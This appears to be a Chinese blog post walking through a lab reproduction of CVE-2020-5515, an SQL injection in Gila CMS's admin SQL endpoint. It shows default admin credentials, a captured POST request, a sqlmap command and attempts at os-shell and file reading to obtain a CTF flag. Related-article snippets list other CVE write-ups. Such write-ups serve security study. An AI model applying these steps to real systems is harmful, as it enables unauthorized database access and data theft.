CVE-2020-5515

最新推荐文章于 2024-09-08 09:10:51 发布
最新推荐文章于 2024-09-08 09:10:51 发布
阅读量223 收藏 2
点赞数 1
分类专栏: CVE漏洞复现 文章标签: sql web安全 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51674437/article/details/131907567
版权
CVE-2020-5515 漏洞复现

这次的漏洞存在于一个CMS框架众

Gila CMS 1.11.8 /admin/sql?query= 存在sql注入

得到目标后,直接访问 http://xxx/admin/sql?query=1 然后发现需要登录。简单尝试后,发现账号一定是标准的邮箱格式,进行常见的破包,发现账号为 admin@admin.com / admin 登录成。登录成功后简单很多了。
在这里插入图片描述

继续访问网址,http://xxx/admin/sql?query=1 发现

GET请求是没有放回的,点击执行后的POST请求是有返回的
在这里插入图片描述

所以可以通过bp 抓包后,直接使用sqlmap进行请求。

请求包: 这里的query=select 1 是为了方便sqlmap拼接,直接跑出结果。

POST /admin/sql HTTP/1.1
Host: x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://eci-2zecu8o9pmgivtuzr8yw.cloudeci1.ichunqiu.com
Connection: close
Cookie: PHPSESSID=umlh5bqi9j1u4tk3d1fvopmmjq; GSESSIONID=11a8krjv79vxg4nkaejj8ffcxo0paav6dcmz0txuh2man11u7r
Upgrade-Insecure-Requests: 1

query=select 1

保存为1.txt,后使用sqlmap跑出结果即可

sqlmap.py -r 1.txt --random-agent --batch

跑出结果后,查数据库,发现没有ctf数据库,那么就要进行–os-shell,发现也不行,那就只能自己写shell或者直接读取文件就行
在这里插入图片描述

直接读取文件也可以得到flag

在这里插入图片描述

尝试了下写shell,发现对输入的数据会过滤,正常的好像也写不进,应该是没有写入的权限。

这次这个漏洞存在的原因,是这个cms进行SQL语句查询的时候,要维护就是可能禁用一些函数,不过这个能登录到后台的危害明显大于其他,框架上也有上传文件的情况,但是这个环境好像都禁用了没办法使用。
Hxdih
关注
专栏目录
Gila CMS 文件上传漏洞(CVE-2020-28692)
玄道的网安博客
12-18 1178
简介 Gila CMS是一套基于PHP和MySQL的开源内容管理系统(CMS) 洞概述 攻击者可利用该漏洞可以上传shell到tmp directy,并通过logs函数滥用.htaccess来执行PHP文件。 影响版本 Gila CMS 1.16.0版本存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/GilaCMS/gila/archive/1.16.0.zip 访问后台页面成功即为安装完成 漏洞复现 登录用户 漏洞url /ad.
CVE-2020-9502
qq_43430261的博客
07-10 503
CVE-2020-9502 简介 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台 影响范围 11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x F5 BIG-IP漏洞CVE-2020-5902 F5 BIG-IP漏洞CVE-2020-5902已遭到利用,建议用户尽快升级,7月1日,NCC的安全研究员发现,黑客已经开始利用F5 BIG-IP中的漏洞(CVE-2020-5902)发起攻击
春秋云镜 CVE-2020-5515
qq_22002773的博客
08-04 343
春秋云镜 CVE-2020-5515
OpenSSH命令注入漏洞(CVE-2020-15778)
weixin_41182861的博客
09-25 5113
漏洞简述 OpenSSH是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效防止窃听、连接劫持以及其他攻击。 实际环境汇中的利用场景: 对于用户来说,ssh被阻止,但在authorized_keys文件中的命令选项允许使用scp的情况下,可以绕过此限制并在远程服务器上执行命令。也就是说,实际中通过各种手段获取到ssh的用户密码,但是不允许ssh连接,或者IP连接受限等情况下,可以尝试此漏洞进行利用。 涉及版本:OpenS
CVE-2020-5135:SonicOS缓冲区溢出漏洞通告
热门推荐
爱国小白帽
10-17 1万+
360CERT [三六零CERT](javascript:void(0)???? 今天 0x01 漏洞简述 2020年10月16日,360CERT监测发现 SonicWALL官方 发布了 SonicOS的风险通告,漏洞等级:严重,漏洞评分:9.4。 SonicOS中存在缓冲区溢出漏洞,远程攻击者可以利用该漏洞向防火墙发送恶意请求,最终导致拒绝服务(DoS)攻击,并潜在的执行任意代码。 对此,360CERT建议广大用户及时将Sonic OS升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻
Hacknos-3
hk653257的博客
02-23 197
kali ip:192.168.1.193 target ip:192.168.1.202 靶机下载:hackNos: Os-hackNos-3 ~ VulnHub 靶机目标:普通用户的user.txt和root用户的root.txt 步骤一:使用nmap进行网络扫描,发现目标192.168.1.202为入侵目标靶机... nmap -sn 192.168.1.0/24 nmap -sS -A -T5 192.168.1.202 -O 步骤二:使用gobuster工具对该网
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8110
多次跳转导致的ssrf
CVE2019_0708
weixin_45383720的博客
11-12 536
CVE2019_0708是目前2019年最具危害性的漏洞CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。 漏洞利用的poc import socket, sys, struct...
SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞)
04-01
CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞) ff! RECON(NetWeaver上的可远程利用代码)? 伙计们,真的吗? 那是您想到的最好的代号? :) 此脚本可检查SAP LM配置向导是否缺少授权检查漏洞,并且PoC...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-11890:CVE-2020-11890
03-10
CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163 CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 ...
关于sql的优化
weixin_54689506的博客
09-06 544
可以根据索引的选择性来决定,而选择性是指不重复的索引值(基数)和数据表的记录总数的比值,索引选择性越高则查询效率越高,唯一索引的选择性是1,这是最好的索引选择性,性能也是最好的。5,尽量使用联合索引,减少单列索引,查询时,联合索引很多时候可以覆盖索引,节省存储空间,避免回表,提高查询效率。6,要控制索引的数量,索引并不是多多益善,索引越多,维护索引的代价也就越大,会影响增删改的效率。3,尽量选择区分度高的列作为索引,尽量建立唯一索引,区分度越高,使用索引的效率越高。
被低估的SQL
weixin_61431494的博客
09-03 1805
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQLServer分组查询
最新发布
NaZiMeKiY的博客
09-08 475
例如我们再在日期后加入一个总人数在3人及以上的限制,那么就会用到聚合函数count(),但是where中是不能使用聚合函数作为限制条件的,所以我们需要用到having关键字。注意点:在分组查询中除了使用聚合函数的数据和使用group by和select后面的分组之外,数据都无法作为一列显示。可以不断使用union链接,但是相对应的是代码实在太过繁琐,所以我们还是使用group by的方式进行分组。五.在使用分组查询时添加多个限制条件,并且使用到聚合函数。例如我们加上一个出生日期的限制,只统计00后的数据。
基于SSM的文物管理系统(含源码+sql+视频导入教程+文档+PPT)
coderbu的博客
09-06 1464
基于SSM的文物管理系统拥有俩种角色 管理员:个人信息管理、用户管理、分类管理、文物信息管理、文物外借管理、文物维修管理、留言板管理等 用户:登录注册、分类浏览文物信息,留言评论、收藏文物等
leetcode 1651 Hopper公司查询3(postgresql)
weixin_51696882的博客
09-06 923
编写SQL查询以计算从 2020年1月至3月至2020年10月至12月 的每三个月窗口的 average_ride_distance 和 average_ride_duration 。将 average_ride_distance 和 average_ride_duration 四舍五入至 小数点后两位 。 通过将三个月的总 ride_distance 相加并除以 3 来计算 average_ride_distance 。average_ride_duration 的计算方法与此类似。 返回按 month
sql server 用户信息查询
woshilys的专栏
09-06 1066
【代码】sql server 用户信息查询。
CVE-2020-0796补丁
07-03
CVE-2020-0796是一个安全漏洞的标识符,通常由Common Vulnerabilities and Exposures(公共漏洞及暴露)项目维护。这个特定的漏洞可能涉及到不同的软件产品或服务,但一般来说,它是对某个软件系统的一个严重弱点,可能导致未经授权的访问、数据泄露或其他形式的安全威胁。 CVE-2020-0796补丁是指针对这一漏洞的具体修复程序。开发商发布该补丁是为了修补源代码中的缺陷,防止攻击者利用已知的漏洞执行恶意活动。安装此补丁后,系统会增强安全性,使用户能够避免因CVE-2020-0796导致的潜在风险。 要了解CVE-2020-0796的具体细节,比如它影响的是哪个软件、其影响范围和严重程度,以及如何下载和应用补丁,你需要查看相关的官方公告、厂商发布的安全更新说明或者是网络安全专业网站的报告。如果你的操作系统或应用程序受到影响,应尽快获取并安装相应的补丁,以保障系统的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值